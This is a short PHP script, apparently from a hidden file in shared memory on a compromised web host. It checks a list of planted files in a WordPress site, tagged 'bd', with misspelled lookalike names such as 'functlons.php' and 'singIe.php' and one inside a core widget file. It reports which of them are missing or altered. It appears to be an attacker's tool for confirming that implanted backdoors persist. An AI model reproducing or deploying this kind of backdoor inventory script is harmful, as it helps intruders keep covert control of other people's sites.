File: //run/shm/.hld
<?php $r = '/home/peerlendingadvisors/peerlendingadvisors.com'; $x = ["/wp-includes/widgets/class-wp-widget-media-audio.php"=>"bd@@357767@@Content-Security-Policy",
"/29c42f.php"=>"bd@@20406@@105",
"/c68dd8.php"=>"bd@@18375@@105",
"/wp-content/themes/search-template-1748013343/sldebar.php"=>"bd@@250075@@727",
"/wp-content/themes/home_1748020186/functlons.php"=>"bd@@260828@@727",
"/wp-content/themes/config-1747921519/singIe.php"=>"bd@@229113@@731",
"/wp-content/plugins/custom-1751115093/wp-config.php"=>"bd@@426017@@727"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');